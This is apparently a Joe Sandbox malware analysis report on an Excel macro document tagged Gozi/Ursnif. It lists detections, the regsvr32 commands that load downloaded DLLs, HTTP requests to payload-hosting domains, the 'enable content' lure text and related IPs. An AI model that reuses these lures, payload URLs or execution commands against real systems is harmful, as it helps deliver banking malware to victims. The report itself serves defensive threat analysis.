Loading ...

Play interactive tourEdit tour

Analysis Report 12345.xlsm

Overview

General Information

Sample Name:12345.xlsm
Analysis ID:382553
MD5:5851c6423d6cffdbfdd9ce4276592acb
SHA1:8992a00647a35e67a887127b5aa7269cc9c597c6
SHA256:a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
Tags:GGGoziISFBUrsnifxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1476 cmdline: regsvr32.exe -s ..\nvcoerf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1820 cmdline: regsvr32.exe -s ..\nvcoerf1.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2560 cmdline: regsvr32.exe -s ..\nvcoerf2.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2608 cmdline: regsvr32.exe -s ..\nvcoerf3.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2592 cmdline: regsvr32.exe -s ..\nvcoerf4.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: 12345.xlsmReversingLabs: Detection: 16%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 4MB later: 126MB
    Source: global trafficDNS query: name: velma-harber30ku.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80
    Source: Joe Sandbox ViewIP Address: 103.205.143.227 103.205.143.227
    Source: Joe Sandbox ViewIP Address: 8.211.4.209 8.211.4.209
    Source: Joe Sandbox ViewIP Address: 74.208.236.90 74.208.236.90
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: velma-harber30ku.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laura9630fr.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mills-skyla30ec.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: moumitas.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jacktech.jackindia.comConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\699323C9.pngJump to behavior
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: velma-harber30ku.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laura9630fr.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mills-skyla30ec.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: moumitas.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jacktech.jackindia.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: velma-harber30ku.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 06 Apr 2021 07:48:01 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 74Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.
    Source: regsvr32.exe, 00000003.00000002.2093312611.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093803930.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2094400807.0000000001D80000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094974245.0000000001C80000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096134178.0000000001C30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
    Source: Screenshot number: 4Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
    Source: Screenshot number: 8Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: 12345.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: 12345.xlsmInitial sample: Sheet size: 30888
    Source: workbook.xmlBinary string: " sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$BO$133</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: classification engineClassification label: mal72.expl.evad.winXLSM@11/10@5/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$12345.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC947.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 12345.xlsmReversingLabs: Detection: 16%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf1.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf2.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf3.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf4.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf1.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf2.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf3.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf4.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Masquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    12345.xlsm17%ReversingLabsDocument-Excel.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://velma-harber30ku.com/gg.gif0%Avira URL Cloudsafe
    http://mills-skyla30ec.com/gg.gif0%Avira URL Cloudsafe
    http://jacktech.jackindia.com/ds/0204.gif0%Avira URL Cloudsafe
    http://moumitas.com/ds/0204.gif0%Avira URL Cloudsafe
    http://laura9630fr.com/gg.gif0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    laura9630fr.com
    8.211.4.209
    truefalse
      unknown
      mills-skyla30ec.com
      8.211.4.209
      truefalse
        unknown
        jacktech.jackindia.com
        103.205.143.227
        truefalse
          unknown
          velma-harber30ku.com
          8.211.4.209
          truefalse
            unknown
            moumitas.com
            74.208.236.90
            truefalse
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://velma-harber30ku.com/gg.giffalse
              • Avira URL Cloud: safe
              unknown
              http://mills-skyla30ec.com/gg.giffalse
              • Avira URL Cloud: safe
              unknown
              http://jacktech.jackindia.com/ds/0204.giffalse
              • Avira URL Cloud: safe
              unknown
              http://moumitas.com/ds/0204.giffalse
              • Avira URL Cloud: safe
              unknown
              http://laura9630fr.com/gg.giffalse
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2093312611.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093803930.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2094400807.0000000001D80000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094974245.0000000001C80000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096134178.0000000001C30000.00000002.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              103.205.143.227
              jacktech.jackindia.comIndia
              132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
              8.211.4.209
              laura9630fr.comSingapore
              45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
              74.208.236.90
              moumitas.comUnited States
              8560ONEANDONE-ASBrauerstrasse48DEfalse

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:382553
              Start date:06.04.2021
              Start time:09:47:08
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 16s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:12345.xlsm
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal72.expl.evad.winXLSM@11/10@5/3
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsm
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe
              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/382553/sample/12345.xlsm

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              103.205.143.227documents-748443571.xlsmGet hashmaliciousBrowse
              • jacktech.jackindia.com/ds/0204.gif
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • jacktech.jackindia.com/ds/0204.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • jacktech.jackindia.com/ds/0204.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • jacktech.jackindia.com/ds/0204.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • jacktech.jackindia.com/ds/0204.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • jacktech.jackindia.com/ds/0204.gif
              8.211.4.209documents-1887159634.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-748443571.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • mills-skyla30ec.com/gg.gif
              74.208.236.90documents-1887159634.xlsmGet hashmaliciousBrowse
              • moumitas.com/ds/0204.gif
              documents-748443571.xlsmGet hashmaliciousBrowse
              • moumitas.com/ds/0204.gif
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • moumitas.com/ds/0204.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • moumitas.com/ds/0204.gif
              documents-683917632.xlsmGet hashmaliciousBrowse
              • moumitas.com/ds/0204.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • moumitas.com/ds/0204.gif
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • moumitas.com/ds/0204.gif

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              laura9630fr.comdocuments-748443571.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              moumitas.comdocuments-748443571.xlsmGet hashmaliciousBrowse
              • 74.208.236.90
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 74.208.236.90
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 74.208.236.90
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 74.208.236.90
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 74.208.236.90
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 74.208.236.90
              jacktech.jackindia.comdocuments-748443571.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              velma-harber30ku.comdocuments-748443571.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              mills-skyla30ec.comdocuments-748443571.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCdocuments-1887159634.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-748443571.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              L87N50MbDG.exeGet hashmaliciousBrowse
              • 8.209.67.151
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 8.211.4.209
              Proforma invoice.docGet hashmaliciousBrowse
              • 47.244.190.114
              yPkfbflyoh.exeGet hashmaliciousBrowse
              • 8.208.95.18
              4CwmE1pYh5.exeGet hashmaliciousBrowse
              • 47.91.72.80
              com.multicamera.coolwending.translator.apkGet hashmaliciousBrowse
              • 47.253.30.230
              JYDy1dAHdW.exeGet hashmaliciousBrowse
              • 8.208.95.18
              EppTbowa74.exeGet hashmaliciousBrowse
              • 8.208.95.18
              tcNbszVulx.exeGet hashmaliciousBrowse
              • 8.208.95.18
              USHrlfZEJC.exeGet hashmaliciousBrowse
              • 8.208.95.18
              Order Drawing.exeGet hashmaliciousBrowse
              • 47.241.107.134
              msals.pumpl.dllGet hashmaliciousBrowse
              • 8.208.95.92
              RMwfvA9kZy.exeGet hashmaliciousBrowse
              • 8.210.22.196
              5zc9vbGBo3.exeGet hashmaliciousBrowse
              • 8.208.95.18
